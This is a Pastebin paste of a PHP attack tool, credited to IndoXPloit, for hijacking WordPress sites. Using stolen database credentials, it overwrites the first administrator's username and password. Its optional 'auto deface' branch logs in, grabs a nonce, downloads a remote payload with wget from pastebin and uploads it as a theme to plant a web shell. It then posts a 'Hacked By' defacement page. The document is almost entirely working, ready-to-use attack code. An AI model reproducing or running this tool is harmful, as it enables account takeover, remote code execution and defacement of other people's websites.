Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //Tu5b0l3d
- //IndoXPloit, HNc
- //http://indoxploit.blogspot.co.id/2015/10/auto-edit-user-and-deface-in-wordpress.html
- if($_POST){
- $host = $_POST['host'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $db = $_POST['db'];
- $dbprefix = $_POST['dbprefix'];
- $user_baru = $_POST['user_baru'];
- $password_baru = $_POST['password_baru'];
- $prefix = $db.".".$dbprefix."users";
- $sue = $db.".".$dbprefix."options";
- $tanya = $_POST['tanya'];
- $target = $_POST['target'];
- $nick = $_POST['nick'];
- $pass = md5("$password_baru");
- mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
- mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
- $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
- $r=mysql_fetch_array($tampil);
- $id = $r[ID];
- $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
- $r2=mysql_fetch_array($tampil2);
- $target = $r2[option_value];
- mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
- if($tanya=="y"){
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- function anucurl($sites){
- $ch1 = curl_init ("$sites");
- curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
- $data = curl_exec ($ch1);
- return $data;
- }
- function lohgin($cek, $web, $userr, $pass){
- $post = array(
- "log" => "$userr",
- "pwd" => "$pass",
- "rememberme" => "forever",
- "wp-submit" => "Log In",
- "redirect_to" => "$web/wp-admin/",
- "testcookie" => "1",
- );
- $ch = curl_init ("$cek");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data6 = curl_exec ($ch);
- return $data6;
- }
- $site= "$target/wp-login.php";
- $site2= "$target/wp-admin/theme-install.php?upload";
- $a = lohgin($site, $target, $user_baru, $password_baru);
- $b = lohgin($site2, $target, $user_baru, $password_baru);
- $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
- echo "# token -> $anu2<br>";
- system('wget http://pastebin.com/raw.php?i=mEQP6prW');
- system('cp raw.php?i=mEQP6prW m.php');
- $post2 = array(
- "_wpnonce" => "$anu2",
- "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
- "themezip" => "@m.php",
- "install-theme-submit" => "Install Now",
- );
- $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data3 = curl_exec ($ch);
- $namafile = "wew.php";
- $fp2 = fopen($namafile,"w");
- fputs($fp2,$nick);
- $y = date("Y");
- $m = date("m");
- $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
- curl_setopt($ch6, CURLOPT_POST, true);
- curl_setopt($ch6, CURLOPT_POSTFIELDS,
- array('file3'=>"@$namafile"));
- curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
- $postResult = curl_exec($ch6);
- curl_close($ch6);
- $as = "$target/k.php";
- $bs = file_get_contents($as);
- if(preg_match("#hacked#si",$bs)){
- echo "# <font color='green'>berhasil mepes...</font><br>";
- echo "# $target/k.php<br>";
- }
- else{
- echo "# <font color='red'>gagal mepes...</font><br>";
- echo "# coba aja manual: <br>";
- echo "# $target/wp-login.php<br>";
- echo "# username: $user_baru<br>";
- echo "# password: $password_baru<br>";
- }
- }
- elseif($tanya=="n"){
- echo "# Sukses<br>";
- echo "# username: $user_baru<br>";
- echo "# password: $password_baru<br>";
- }
- }else{
- echo '<html>
- <head>
- <title>Wordpress Created New User</title>
- </head>
- <body>
- <center>
- <center><div id="button"></div>
- <h2>Wordpress Created New User</h2>
- <table>
- <tr><td><form method="post" action="?action"></td></tr>
- <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
- <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
- <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
- <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
- <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
- <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
- <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
- <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
- <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
- <tr><td><input type="submit" value="Ganti"></td></tr>
- </table>
- *nb: kalo milih y ... silahkan Ganti Form Hacked By Tu5b0l3d jadi Hacked by Nick_ente
- </center>
- </body>';
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement